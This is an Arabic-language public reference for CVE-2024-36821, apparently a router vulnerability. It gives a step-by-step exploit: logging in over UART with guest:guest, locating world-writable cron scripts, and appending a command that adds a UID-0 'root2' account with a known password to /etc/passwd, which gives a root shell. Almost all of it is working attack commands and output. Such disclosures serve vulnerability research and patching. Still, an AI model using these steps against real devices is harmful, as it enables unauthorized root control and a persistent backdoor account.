
المرجع العام الذي يحتوي على الحد الأدنى من المعلومات المطلوبة للثغرة الأمنية المُغطاة بـ CVE-2024-36821
المرجع العام الذي يحتوي على الحد الأدنى من المعلومات المطلوبة للثغرة التي يغطيها CVE-2024-36821
الاتصال بجهاز التوجيه عبر اتصال UART
باستخدام بيانات الاعتماد guest:guest، قم بتسجيل الدخول إلى النظام
باستخدام الأمر find / -perm -777 -type f 2>/dev/null، ابحث عن الملفات التي لديها أذونات القراءة والكتابة والتنفيذ:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
تحقق من المالك باستخدام الأمر ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
قم بتوليد كلمة المرور باستخدام الأمر openssl passwd Abracadabra
قم بتعديل /tmp/cron/cron.everyminute/conntrack_collector.sh، وأضف كلمة المرور الجديدة المُولّدة إلى النهاية:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
انتظر لمدة دقيقة
بدّل المستخدم إلى root2 باستخدام الأمر التالي
/ $ su root2
Password: Abracadabra
~ #